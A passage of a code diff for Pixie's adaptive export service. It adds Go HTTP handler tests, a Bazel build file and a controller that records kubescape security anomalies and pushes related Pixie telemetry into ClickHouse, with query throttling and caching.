+ req := httptest.NewRequest(http.MethodPost, path, strings.NewReader(`{"pod":"p","t_end":1}`))
+ if auth != "" {
+ req.Header.Set("Authorization", auth)
+ }
+ w := httptest.NewRecorder()
+ h.ServeHTTP(w, req)
+ return w.Result().StatusCode
+ }
+ if got := call("/export/start", ""); got != http.StatusUnauthorized {
+ t.Fatalf("no bearer: want 401, got %d", got)
+ }
+ if got := call("/export/start", "Bearer not-a-jwt"); got != http.StatusUnauthorized {
+ t.Fatalf("bad bearer: want 401, got %d", got)
+ }
+ if got := call("/export/start", "Bearer "+good); got == http.StatusUnauthorized {
+ t.Fatalf("valid bearer wrongly rejected (401)")
+ }
+ reqH := httptest.NewRequest(http.MethodGet, "/healthz", nil) // probes stay open
+ wH := httptest.NewRecorder()
+ h.ServeHTTP(wH, reqH)
+ if wH.Result().StatusCode == http.StatusUnauthorized {
+ t.Fatal("/healthz must not require auth")
+ }
+}
+
+func TestStartExportUpserts(t *testing.T) {
+ ex := &fakeExporter{}
+ srv := New(ex, nil)
+ resp := do(t, srv, http.MethodPost, "/export/start",
+ `{"namespace":"log4j-poc","pod":"chain-backend-abc","comm":"sh","t_end":1717200600}`)
+ if resp.StatusCode != http.StatusAccepted {
+ t.Fatalf("status = %d, want 202", resp.StatusCode)
+ }
+ if len(ex.upserts) != 1 || ex.upserts[0].Pod != "chain-backend-abc" ||
+ ex.upserts[0].Namespace != "log4j-poc" {
+ t.Fatalf("upsert = %+v, want one for log4j-poc/chain-backend-abc", ex.upserts)
+ }
+ if ex.lastEnd != time.Unix(1717200600, 0) {
+ t.Fatalf("tEnd = %v, want 1717200600", ex.lastEnd)
+ }
+}
+
+func TestStopExportRemoves(t *testing.T) {
+ ex := &fakeExporter{}
+ srv := New(ex, nil)
+ resp := do(t, srv, http.MethodPost, "/export/stop",
+ `{"namespace":"log4j-poc","pod":"chain-backend-abc"}`)
+ if resp.StatusCode != http.StatusAccepted {
+ t.Fatalf("status = %d, want 202", resp.StatusCode)
+ }
+ if len(ex.removes) != 1 || ex.removes[0].Pod != "chain-backend-abc" {
+ t.Fatalf("remove = %+v, want one for chain-backend-abc", ex.removes)
+ }
+}
+
+func TestOrderQueryRunsAndCarriesID(t *testing.T) {
+ ex := &fakeExporter{}
+ rn := &fakeRunner{}
+ srv := New(ex, rn)
+ resp := do(t, srv, http.MethodPost, "/query",
+ `{"namespace":"log4j-poc","pod":"p","comm":"sh","table":"conn_stats","window":[100,200],"query_id":"log4j-poc:p:conn_stats:100-200"}`)
+ if resp.StatusCode != http.StatusAccepted {
+ t.Fatalf("status = %d, want 202", resp.StatusCode)
+ }
+ if len(rn.calls) != 1 || rn.calls[0] != "conn_stats|log4j-poc/p|log4j-poc:p:conn_stats:100-200" {
+ t.Fatalf("calls = %v", rn.calls)
+ }
+}
+
+func TestQueryWithoutRunnerIs501(t *testing.T) {
+ srv := New(&fakeExporter{}, nil) // no runner wired
+ resp := do(t, srv, http.MethodPost, "/query",
+ `{"namespace":"n","pod":"p","table":"conn_stats","window":[1,2],"query_id":"x"}`)
+ if resp.StatusCode != http.StatusNotImplemented {
+ t.Fatalf("status = %d, want 501", resp.StatusCode)
+ }
+}
+
+func TestBadInputRejected(t *testing.T) {
+ srv := New(&fakeExporter{}, &fakeRunner{})
+ // missing pod
+ if r := do(t, srv, http.MethodPost, "/export/start", `{"namespace":"n"}`); r.StatusCode != http.StatusBadRequest {
+ t.Fatalf("start no-pod = %d, want 400", r.StatusCode)
+ }
+ // malformed json
+ if r := do(t, srv, http.MethodPost, "/export/stop", `{not json`); r.StatusCode != http.StatusBadRequest {
+ t.Fatalf("stop bad-json = %d, want 400", r.StatusCode)
+ }
+ // query missing table
+ if r := do(t, srv, http.MethodPost, "/query", `{"pod":"p","query_id":"x","window":[1,2]}`); r.StatusCode != http.StatusBadRequest {
+ t.Fatalf("query no-table = %d, want 400", r.StatusCode)
+ }
+}
+
+func TestWrongMethodRejected(t *testing.T) {
+ srv := New(&fakeExporter{}, &fakeRunner{})
+ if r := do(t, srv, http.MethodGet, "/export/start", ``); r.StatusCode != http.StatusMethodNotAllowed {
+ t.Fatalf("GET start = %d, want 405", r.StatusCode)
+ }
+}
+
+func TestRunnerErrorIsBadGateway(t *testing.T) {
+ rn := &fakeRunner{err: errFake}
+ srv := New(&fakeExporter{}, rn)
+ r := do(t, srv, http.MethodPost, "/query",
+ `{"namespace":"n","pod":"p","table":"conn_stats","window":[1,2],"query_id":"x"}`)
+ if r.StatusCode != http.StatusBadGateway {
+ t.Fatalf("runner-error = %d, want 502", r.StatusCode)
+ }
+}
+
+func TestHealthz(t *testing.T) {
+ srv := New(&fakeExporter{}, nil)
+ if r := do(t, srv, http.MethodGet, "/healthz", ``); r.StatusCode != http.StatusOK {
+ t.Fatalf("healthz = %d, want 200", r.StatusCode)
+ }
+}
+
+type fakeErr struct{}
+
+func (fakeErr) Error() string { return "boom" }
+
+var errFake = fakeErr{}
diff --git a/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel
new file mode 100644
index 00000000000..5e19fbeaf1e
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/controller/BUILD.bazel
@@ -0,0 +1,44 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "controller",
+ srcs = ["controller.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ "//src/vizier/services/adaptive_export/internal/kubescape",
+ "//src/vizier/services/adaptive_export/internal/pxl",
+ "//src/vizier/services/adaptive_export/internal/reconcile",
+ "//src/vizier/services/adaptive_export/internal/sink",
+ "@com_github_sirupsen_logrus//:logrus",
+ ],
+)
+
+pl_go_test(
+ name = "controller_test",
+ srcs = ["controller_test.go"],
+ embed = [":controller"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ "//src/vizier/services/adaptive_export/internal/kubescape",
+ "//src/vizier/services/adaptive_export/internal/sink",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/controller/controller.go b/src/vizier/services/adaptive_export/internal/controller/controller.go
new file mode 100644
index 00000000000..601c3a27b30
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/controller/controller.go
@@ -0,0 +1,760 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package controller orchestrates the adaptive-write push flow on a
+// single node:
+//
+// 1. Subscribe to a Trigger that produces kubescape.Event values.
+// 2. For each event, derive the workload anomaly.Target + AnomalyHash,
+// look up the in-memory active set for this hostname, and either
+// open a new active row or extend an existing one (t_end ← now+after).
+// 3. Persist the resulting AttributionRow to ClickHouse via Sink.
+//
+// The controller does NOT execute PxL itself, does NOT write pixie
+// observation rows, and does NOT manage retention scripts. Pixie's
+// retention plugin (driven by user-defined PxL scripts in the UI)
+// owns those concerns. Operator's only output is forensic_db.adaptive_attribution.
+package controller
+
+import (
+ "context"
+ "sync"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink"
+)
+
+// Trigger is the source of new kubescape events.
+type Trigger interface {
+ Subscribe(ctx context.Context) (<-chan kubescape.Event, error)
+}
+
+// Sink writes attribution rows to ClickHouse and, on boot, can fetch
+// still-active rows so the controller can rehydrate after a crash.
+// WritePixieRows is the rev-1 fallback path for environments where
+// the cloud's retention plugin can't reach the in-cluster CH (so the
+// operator queries pixie itself and pushes rows directly).
+type Sink interface {
+ Write(ctx context.Context, rows []sink.AttributionRow) error
+ QueryActive(ctx context.Context, hostname string) ([]sink.AttributionRow, error)
+ WritePixieRows(ctx context.Context, table string, rows []map[string]any) error
+}
+
+// PixieQuerier is the rev-1 path's executor: take a PxL string and
+// return the resulting rows. nil disables operator-side pixie pushes
+// (rev-2 default — the cloud's plugin handles it).
+type PixieQuerier interface {
+ Query(ctx context.Context, pxl string) ([]map[string]any, error)
+}
+
+// Clock abstracts time for tests.
+type Clock interface {
+ Now() time.Time
+}
+
+// RealClock is the production Clock.
+type RealClock struct{}
+
+// Now returns time.Now().
+func (RealClock) Now() time.Time { return time.Now() }
+
+// Config tunes the controller. Zero values fall through to safe defaults.
+type Config struct {
+ // Hostname is the node-local key. REQUIRED.
+ Hostname string
+
+ // Rec records per-pull read/wrote counts for the FILTER fan-out path
+ // (ADAPTIVE_RECONCILE). nil → reconcile.Nop{} in New (instrument off).
+ Rec reconcile.Recorder
+
+ // Before / After form the time window: t_start = event_time - Before,
+ // t_end = max(t_end, now + After). Both default to 5 min.
+ Before time.Duration
+ After time.Duration
+
+ // PushPixieTables, when non-empty alongside a non-nil Pixie querier,
+ // makes the controller query pixie for every named table on each
+ // fresh anomaly window and push the result directly to
+ // forensic_db.. Used in environments where the cloud's
+ // retention plugin can't reach the in-cluster CH service.
+ PushPixieTables []string
+
+ // PushRefreshInterval — how often pushPixieRows re-queries pixie
+ // while the attribution window is still active. The first query
+ // covers [t_start, now]; subsequent queries cover only the new
+ // per-table slice [last_upper[table], now] so we don't duplicate
+ // rows. Zero (the natural Go default for unset env vars) is
+ // rewritten to 30s in defaulted(). To DISABLE periodic re-fan-out
+ // (single-shot mode, which loses pixie traffic that arrives after
+ // the kubescape event) set this to a NEGATIVE duration — pick -1
+ // to be unambiguous.
+ PushRefreshInterval time.Duration
+
+ // === Throughput-protection knobs ===
+ //
+ // At high anomaly rates (many concurrent active hashes), the default
+ // pushPixieRows behavior — N parallel PxL queries per hash, no
+ // global cap — can DoS the vizier-query-broker (observed: 90% of
+ // queries DeadlineExceeded at 180s under 4× sweep load). The three
+ // knobs below are independent throttles; all default to 0 (= legacy
+ // unbounded behavior preserved).
+ //
+ // MaxParallelQueriesPerHash caps concurrent goroutines INSIDE one
+ // pushPixieRows pass. 0 = no cap (current). Recommended 3-5 for
+ // load-protective deployments.
+ MaxParallelQueriesPerHash int
+
+ // MaxInflightQueriesGlobal caps concurrent PxL queries across all
+ // pushPixieRows goroutines (every hash). 0 = no cap (current).
+ // Recommended 20-50 — sized to broker capacity.
+ MaxInflightQueriesGlobal int
+
+ // EmptyResultSkipAfterN: after this many consecutive 0-row returns
+ // for the same (pod, table) pair, skip that pair on subsequent
+ // passes for EmptyResultSkipTTL. 0 = disabled (current). A pgsql
+ // pod that never speaks HTTP returns 0 on every http_events
+ // query; skipping eliminates that waste.
+ EmptyResultSkipAfterN int
+
+ // EmptyResultSkipTTL controls how long a (pod, table) stays in the
+ // negative cache. 0 = disabled (current). When the TTL expires the
+ // pair is retried, so a pod that newly starts a protocol
+ // self-heals within at most TTL seconds.
+ EmptyResultSkipTTL time.Duration
+
+ // OnAttribution, when non-nil, is called for every event after
+ // the attribution row has been computed (whether the row is new
+ // or an extension). The rev-3 streaming path uses this to feed
+ // its ActiveSet without touching controller internals.
+ //
+ // Contract:
+ // - Called from controller.handle's goroutine.
+ // - Synchronous; do NOT block. Callbacks that need to do work
+ // should hand off to a goroutine + buffered channel internally.
+ // - tEnd is the post-event t_end (= now + After for new rows,
+ // or the extended value for existing ones).
+ OnAttribution func(namespace, pod string, tEnd time.Time)
+
+ // OnPrune, when non-nil, is called for each hash evicted by
+ // PruneExpired with the (namespace, pod) of the evicted row.
+ // Used by the rev-3 streaming path to shrink its ActiveSet.
+ // Same contract as OnAttribution: synchronous, non-blocking.
+ OnPrune func(namespace, pod string)
+}
+
+func (c *Config) defaulted() Config {
+ out := *c
+ if out.Before == 0 {
+ out.Before = 5 * time.Minute
+ }
+ if out.After == 0 {
+ out.After = 5 * time.Minute
+ }
+ // Zero → fall through to the 30s default. NEGATIVE values are
+ // preserved so callers can explicitly request single-shot mode
+ // (see PushRefreshInterval doc above).
+ if out.PushRefreshInterval == 0 {
+ out.PushRefreshInterval = 30 * time.Second
+ }
+ return out
+}
+
+// Controller is the live orchestrator. One instance per operator process.
+type Controller struct {
+ trig Trigger
+ sink Sink
+ clock Clock
+ cfg Config
+ querier PixieQuerier // nil disables operator-side pixie pushes
+
+ mu sync.Mutex
+ active map[anomaly.AnomalyHash]*sink.AttributionRow
+ // inFlight tracks hashes whose pushPixieRows goroutine is currently
+ // running. handle() re-launches the goroutine when the previous one
+ // has exited (window expired between bursts), so a hash that already
+ // exists in `active` but is no longer being actively fanned-out
+ // gets refreshed protocol-table writes on the next alert. Without
+ // this, the goroutine only spawns on the very first event for a
+ // hash and subsequent bursts silently stop populating per-table
+ // rows even though attribution keeps updating in CH.
+ inFlight map[anomaly.AnomalyHash]bool
+
+ // globalSem is the buffered channel that implements the
+ // MaxInflightQueriesGlobal throttle. nil → no global cap.
+ globalSem chan struct{}
+
+ // emptyCacheMu guards emptyStreak and emptySkipUntil. Both are keyed
+ // by "ns|pod|table" — namespace must be part of the key, otherwise
+ // same-named pods in different namespaces share suppression state.
+ emptyCacheMu sync.Mutex
+ emptyStreak map[string]int // consecutive 0-row returns
+ emptySkipUntil map[string]time.Time // skip this (ns,pod,table) until this time
+}
+
+// New wires a Controller. nil clock falls through to RealClock.
+// nil querier disables the rev-1 push path (controller will only
+// write attribution rows; expects cloud's retention plugin to write
+// pixie tables).
+func New(trig Trigger, snk Sink, cfg Config, clk Clock) *Controller {
+ if clk == nil {
+ clk = RealClock{}
+ }
+ defaulted := cfg.defaulted()
+ if defaulted.Rec == nil {
+ defaulted.Rec = reconcile.Nop{}
+ }
+ c := &Controller{
+ trig: trig,
+ sink: snk,
+ clock: clk,
+ cfg: defaulted,
+ active: map[anomaly.AnomalyHash]*sink.AttributionRow{},
+ inFlight: map[anomaly.AnomalyHash]bool{},
+ emptyStreak: map[string]int{},
+ emptySkipUntil: map[string]time.Time{},
+ }
+ if defaulted.MaxInflightQueriesGlobal > 0 {
+ c.globalSem = make(chan struct{}, defaulted.MaxInflightQueriesGlobal)
+ }
+ return c
+}
+
+// WithPixieQuerier wires the rev-1 path. Returns the receiver for
+// chaining. Idempotent — call before Run.
+func (c *Controller) WithPixieQuerier(q PixieQuerier) *Controller {
+ c.querier = q
+ return c
+}
+
+// Rehydrate populates the in-memory active set from ClickHouse so a
+// restarted operator picks up where it left off. Idempotent. Call
+// once at boot before Run.
+func (c *Controller) Rehydrate(ctx context.Context) error {
+ rows, err := c.sink.QueryActive(ctx, c.cfg.Hostname)
+ if err != nil {
+ return err
+ }
+ c.mu.Lock()
+ var resume []sink.AttributionRow
+ for i := range rows {
+ row := rows[i]
+ c.active[row.AnomalyHash] = &row
+ // Rev-1: a restart restored the window but no pushPixieRows goroutine —
+ // without this, post-restart Pixie data is silently missed until another
+ // event for the same hash arrives (CodeRabbit). Re-arm the fan-out for
+ // each restored window, mirroring handle()'s spawn (in-flight guarded).
+ if c.querier != nil && len(c.cfg.PushPixieTables) > 0 && !c.inFlight[row.AnomalyHash] {
+ c.inFlight[row.AnomalyHash] = true
+ resume = append(resume, row)
+ }
+ }
+ c.mu.Unlock()
+ for i := range resume {
+ r := resume[i]
+ go func() {
+ defer func() {
+ c.mu.Lock()
+ delete(c.inFlight, r.AnomalyHash)
+ c.mu.Unlock()
+ }()
+ c.pushPixieRows(ctx, r)
+ }()
+ }
+ log.WithFields(log.Fields{"rehydrated": len(rows), "resumed": len(resume)}).
+ Info("controller: active set restored")
+ return nil
+}
+
+// Run subscribes to the trigger and processes events until ctx is
+// cancelled or the trigger closes its channel. Returns ctx.Err() on
+// cancellation or nil on graceful trigger shutdown.
+func (c *Controller) Run(ctx context.Context) error {
+ ch, err := c.trig.Subscribe(ctx)
+ if err != nil {
+ return err
+ }
+ for {
+ select {
+ case <-ctx.Done():
+ return ctx.Err()
+ case ev, ok := <-ch:
+ if !ok {
+ return nil
+ }
+ c.handle(ctx, ev)
+ }
+ }
+}
+
+// handle processes one event: open or extend the attribution row,
+// then persist to ClickHouse. Errors from Sink.Write are logged but
+// not fatal — system stability rule.
+func (c *Controller) handle(ctx context.Context, ev kubescape.Event) {
+ hash := anomaly.Hash(ev.Target)
+ now := c.clock.Now()
+ tEvent := eventTimeToTime(ev.EventTime)
+
+ c.mu.Lock()
+ row, exists := c.active[hash]
+ if !exists {
+ row = &sink.AttributionRow{
+ AnomalyHash: hash,
+ Namespace: ev.Target.Namespace,
+ Pod: ev.Target.Pod,
+ Comm: ev.Target.Comm,
+ PID: ev.Target.PID,
+ Hostname: c.cfg.Hostname,
+ TStart: tEvent.Add(-c.cfg.Before),
+ TEnd: now.Add(c.cfg.After),
+ LastSeen: tEvent,
+ LastRuleID: ev.RuleID,
+ NAnomalies: 1,
+ }
+ c.active[hash] = row
+ } else {
+ // Extend t_end if the new now+after is later. Never shrink.
+ if proposed := now.Add(c.cfg.After); proposed.After(row.TEnd) {
+ row.TEnd = proposed
+ }
+ // Update last_seen if this event's timestamp is more recent.
+ if tEvent.After(row.LastSeen) {
+ row.LastSeen = tEvent
+ }
+ row.LastRuleID = ev.RuleID
+ row.NAnomalies++
+ }
+ snapshot := *row
+ // Decide AND mark inFlight under the same mutex acquisition so two
+ // rapid events for the same hash can't both decide to spawn.
+ spawn := c.querier != nil && len(c.cfg.PushPixieTables) > 0 && !c.inFlight[hash]
+ if spawn {
+ c.inFlight[hash] = true
+ }
+ c.mu.Unlock()
+
+ if err := c.sink.Write(ctx, []sink.AttributionRow{snapshot}); err != nil {
+ // Attribution persistence failed → do NOT fan out, or we'd write Pixie
+ // rows with no persisted attribution anchor (orphaned rows, CodeRabbit).
+ // Non-fatal (system-stability rule): release the reserved in-flight slot
+ // and return; a later event for the same hash retries.
+ log.WithError(err).Warn("controller: sink write failed — skipping fan-out")
+ if spawn {
+ c.mu.Lock()
+ delete(c.inFlight, hash)
+ c.mu.Unlock()
+ }
+ return
+ }
+ if c.cfg.OnAttribution != nil {
+ c.cfg.OnAttribution(snapshot.Namespace, snapshot.Pod, snapshot.TEnd)
+ }
+ // Rev-1 path: query pixie for the [t_start, t_end) slice of every
+ // PushPixieTables table for this (namespace, pod) and write rows
+ // directly to CH. Done in a goroutine so the controller doesn't
+ // block on PxL execution (each query can take hundreds of ms;
+ // N tables sequentially would stall the trigger). Re-spawned on
+ // every event whose hash currently has no in-flight goroutine
+ // (covers both brand-new hashes and hashes whose previous
+ // pushPixieRows exited because the window had quieted down).
+ if spawn {
+ go func() {
+ defer func() {
+ c.mu.Lock()
+ delete(c.inFlight, hash)
+ c.mu.Unlock()
+ }()
+ c.pushPixieRows(ctx, snapshot)
+ }()
+ }
+}
+
+// pushPixieRows fans out per-table PxL queries and writes the results
+// to forensic_db.. One goroutine per anomaly window. The first
+// pass covers [t_start, now]; subsequent passes (every
+// PushRefreshInterval) cover only the new slice [last_upper, now] so
+// pixie traffic that arrives AFTER the initial kubescape event still
+// makes it into CH. Loop exits when the (possibly extended) t_end is
+// in the past or ctx is cancelled. All failures are logged + non-fatal.
+func (c *Controller) pushPixieRows(ctx context.Context, initial sink.AttributionRow) {
+ target := anomaly.Target{
+ PID: initial.PID,
+ Comm: initial.Comm,
+ Pod: initial.Pod,
+ Namespace: initial.Namespace,
+ }
+ log.WithFields(log.Fields{
+ "hash": initial.AnomalyHash,
+ "pod": initial.Pod,
+ "comm": initial.Comm,
+ "tables": len(c.cfg.PushPixieTables),
+ "refresh": c.cfg.PushRefreshInterval,
+ "t_start": initial.TStart,
+ "t_end": initial.TEnd,
+ }).Info("pushPixieRows: starting fan-out")
+
+ // Per-table watermark of pixie data we've already pulled for THIS
+ // hash. We advance a table's cursor only after BOTH the query AND
+ // the sink-write succeed; failures keep the cursor in place so the
+ // next pass retries the same slice instead of dropping it.
+ lastUpper := make(map[string]time.Time, len(c.cfg.PushPixieTables))
+ for _, t := range c.cfg.PushPixieTables {
+ lastUpper[t] = initial.TStart
+ }
+ pass := 0
+ for {
+ if ctx.Err() != nil {
+ return
+ }
+ // Re-snapshot the active row each iteration so we pick up t_end
+ // extensions from concurrent kubescape events (extending the
+ // window beyond the initial t_end). COPY the row out of the
+ // shared pointer before releasing the mutex — handle() mutates
+ // the same struct, so reading TEnd after Unlock would race.
+ c.mu.Lock()
+ live, exists := c.active[initial.AnomalyHash]
+ var current sink.AttributionRow
+ if exists {
+ current = *live
+ }
+ c.mu.Unlock()
+ if !exists {
+ log.WithField("hash", initial.AnomalyHash).
+ Info("pushPixieRows: window closed (active entry gone)")
+ return
+ }
+ now := c.clock.Now()
+ if !current.TEnd.After(now) {
+ log.WithFields(log.Fields{
+ "hash": initial.AnomalyHash,
+ "t_end": current.TEnd,
+ }).Info("pushPixieRows: fan-out complete (window expired)")
+ return
+ }
+
+ pass++
+ // Fan out the per-table PxL queries IN PARALLEL. The serial
+ // rev-1 loop spent 1.5-5s per refresh waiting for the 9 tables
+ // that return 0 rows for this pod (a redis-server pod only ever
+ // has data in redis_events; the other 9 queries are pure
+ // latency tax). Parallel cuts the per-pass wall time to roughly
+ // max(query_time) instead of sum(query_times). Each goroutine
+ // runs an independent Pixie RPC; the cloud's PassThroughProxy
+ // fans them across vizier-query-broker fine in our measurements
+ // (10 simultaneous in-flight queries → ~250-700ms wall vs
+ // ~3-5s serial).
+ type tableResult struct {
+ table string
+ sliceEnd time.Time
+ rows int
+ err error
+ }
+ results := make(chan tableResult, len(c.cfg.PushPixieTables))
+ var wg sync.WaitGroup
+ // Per-hash concurrency limiter (knob #1: MaxParallelQueriesPerHash).
+ // nil → unbounded (legacy behavior preserved).
+ var perHashSem chan struct{}
+ if c.cfg.MaxParallelQueriesPerHash > 0 {
+ perHashSem = make(chan struct{}, c.cfg.MaxParallelQueriesPerHash)
+ }
+ for _, table := range c.cfg.PushPixieTables {
+ if ctx.Err() != nil {
+ break
+ }
+ // Knob #3: negative-cache skip. Pods that have returned 0
+ // rows for this table N times in a row are skipped for TTL.
+ // Self-heals when TTL expires.
+ if c.shouldSkipEmpty(initial.Namespace, initial.Pod, table) {
+ continue
+ }
+ sliceStart := lastUpper[table]
+ sliceEnd := now
+ if !sliceEnd.After(sliceStart) {
+ continue // tiny / inverted slice — skip
+ }
+ q, err := pxl.QueryFor(table, target, sliceStart, sliceEnd, now)
+ if err != nil {
+ log.WithError(err).WithField("table", table).Warn("controller: QueryFor")
+ continue
+ }
+ wg.Add(1)
+ go func(table, q string, sliceStart, sliceEnd time.Time) {
+ defer wg.Done()
+ // Per-pull reconciliation (ADAPTIVE_RECONCILE): record what
+ // this goroutine READ from Pixie vs WROTE to CH for this
+ // (pod, table, window), on EVERY return path. Deferred so a
+ // sem-cancel / query error / sink error all still emit a row
+ // — the reconcile run needs the failures, not just successes.
+ var readCount, wroteCount int
+ var recErr string
+ defer func() {
+ c.cfg.Rec.Record(ctx, reconcile.Row{
+ TS: now,
+ Mode: "filter",
+ Table: table,
+ Namespace: initial.Namespace,
+ Pod: initial.Pod,
+ WinStart: sliceStart,
+ WinEnd: sliceEnd,
+ ReadCount: int64(readCount),
+ WroteCount: int64(wroteCount),
+ WriteErr: recErr,
+ Hostname: c.cfg.Hostname,
+ })
+ }()
+ // Acquire per-hash slot, then optional global slot.
+ // Order matters: per-hash is cheap and local; global
+ // gates network. Releasing in reverse order avoids the
+ // pathological case where a stuck global slot pins a
+ // per-hash slot for an unrelated table.
+ if perHashSem != nil {
+ select {
+ case perHashSem <- struct{}{}:
+ case <-ctx.Done():
+ recErr = ctx.Err().Error()
+ results <- tableResult{table: table, err: ctx.Err()}
+ return
+ }
+ defer func() { <-perHashSem }()
+ }
+ if c.globalSem != nil {
+ select {
+ case c.globalSem <- struct{}{}:
+ case <-ctx.Done():
+ recErr = ctx.Err().Error()
+ results <- tableResult{table: table, err: ctx.Err()}
+ return
+ }
+ defer func() { <-c.globalSem }()
+ }
+ qctx, cancel := context.WithTimeout(ctx, 180*time.Second)
+ rows, qerr := c.querier.Query(qctx, q)
+ cancel()
+ if qerr != nil {
+ recErr = qerr.Error()
+ results <- tableResult{table: table, err: qerr}
+ return
+ }
+ // Update negative cache: 0 rows bumps streak, ≥1 row resets.
+ c.noteQueryResult(initial.Namespace, initial.Pod, table, len(rows))
+ nrows := len(rows)
+ readCount = nrows
+ if nrows > 0 {
+ // Bound the sink write with its own timeout. Without
+ // this, a stalled CH HTTP write would hold the table
+ // goroutine forever, wg.Wait() would block the entire
+ // pass, and refreshes for the active window would stop
+ // — symptoms documented in our session as "fan-out
+ // started, no error, no push" rows in the operator log.
+ wctx, wcancel := context.WithTimeout(ctx, 60*time.Second)
+ werr := c.sink.WritePixieRows(wctx, table, rows)
+ wcancel()
+ if werr != nil {
+ recErr = werr.Error()
+ results <- tableResult{table: table, err: werr}
+ return
+ }
+ wroteCount = nrows
+ log.WithFields(log.Fields{
+ "table": table,
+ "rows": nrows,
+ "hash": initial.AnomalyHash,
+ "pass": pass,
+ }).Info("pushed pixie rows for active anomaly window")
+ }
+ results <- tableResult{table: table, sliceEnd: sliceEnd, rows: nrows}
+ }(table, q, sliceStart, sliceEnd)
+ }
+ wg.Wait()
+ close(results)
+ for r := range results {
+ if r.err != nil {
+ // Distinguish query vs sink errors for the operator log
+ log.WithError(r.err).WithField("table", r.table).Warn("controller: pixie query or sink")
+ continue // do NOT advance lastUpper — retry next pass
+ }
+ lastUpper[r.table] = r.sliceEnd
+ }
+
+ // Refresh interval treats negative as "single-shot" so callers
+ // can opt out via the dedicated negative sentinel; the default
+ // is 30s, set in defaulted(). Zero is reserved for "use default"
+ // to keep the env-parsing layer simple (env unset → 0 → default).
+ if c.cfg.PushRefreshInterval < 0 {
+ log.WithField("hash", initial.AnomalyHash).
+ Info("pushPixieRows: fan-out complete (single-shot mode)")
+ return
+ }
+ if !sleepOrCancel(ctx, c.cfg.PushRefreshInterval) {
+ return
+ }
+ }
+}
+
+// shouldSkipEmpty reports whether (namespace, pod, table) is currently
+// in the negative cache. Returns false when knob #3 is disabled.
+func (c *Controller) shouldSkipEmpty(namespace, pod, table string) bool {
+ if c.cfg.EmptyResultSkipAfterN <= 0 || c.cfg.EmptyResultSkipTTL <= 0 {
+ return false
+ }
+ key := namespace + "|" + pod + "|" + table
+ c.emptyCacheMu.Lock()
+ defer c.emptyCacheMu.Unlock()
+ until, ok := c.emptySkipUntil[key]
+ if !ok {
+ return false
+ }
+ if c.clock.Now().Before(until) {
+ return true
+ }
+ // TTL expired — clear it so the next call retries the query and
+ // can re-arm the cache from observed results.
+ delete(c.emptySkipUntil, key)
+ delete(c.emptyStreak, key)
+ return false
+}
+
+// noteQueryResult updates the negative cache after a successful pixie
+// query. 0 rows bumps the streak; ≥1 row resets it. Once the streak
+// reaches the configured N, the (namespace, pod, table) triple is
+// skipped for TTL.
+func (c *Controller) noteQueryResult(namespace, pod, table string, nrows int) {
+ if c.cfg.EmptyResultSkipAfterN <= 0 || c.cfg.EmptyResultSkipTTL <= 0 {
+ return
+ }
+ c.emptyCacheMu.Lock()
+ defer c.emptyCacheMu.Unlock()
+ key := namespace + "|" + pod + "|" + table
+ if nrows > 0 {
+ delete(c.emptyStreak, key)
+ delete(c.emptySkipUntil, key)
+ return
+ }
+ c.emptyStreak[key]++
+ if c.emptyStreak[key] >= c.cfg.EmptyResultSkipAfterN {
+ c.emptySkipUntil[key] = c.clock.Now().Add(c.cfg.EmptyResultSkipTTL)
+ }
+}
+
+// sleepOrCancel returns true on normal sleep completion, false if ctx cancelled.
+func sleepOrCancel(ctx context.Context, d time.Duration) bool {
+ t := time.NewTimer(d)
+ defer t.Stop()
+ select {
+ case <-ctx.Done():
+ return false
+ case <-t.C:
+ return true
+ }
+}
+
+// Active returns the count of in-memory active hashes (test helper).
+func (c *Controller) Active() int {
+ c.mu.Lock()
+ defer c.mu.Unlock()
+ return len(c.active)
+}
+
+// SnapshotActive returns a fresh QueryActive against CH. Exposed so
+// callers (e.g. main.go) can seed the streaming ActiveSet at boot
+// without having to know about Sink internals.
+func (c *Controller) SnapshotActive(ctx context.Context) ([]sink.AttributionRow, error) {
+ return c.sink.QueryActive(ctx, c.cfg.Hostname)
+}
+
+// eventTimeToTime converts forensic_db.kubescape_logs.event_time (UInt64)
+// into a time.Time, auto-detecting the unit. Vector's kubescape sink in
+// the soc lab writes unix SECONDS (~1.7e9), but other deployments may
+// emit millis (~1.7e12) or nanos (~1.7e18) per kubescape's own field
+// conventions. Magnitude check picks the unit so we don't silently
+// misinterpret the same UInt64 across pipeline variants.
+func eventTimeToTime(et uint64) time.Time {
+ switch {
+ case et < 1e10:
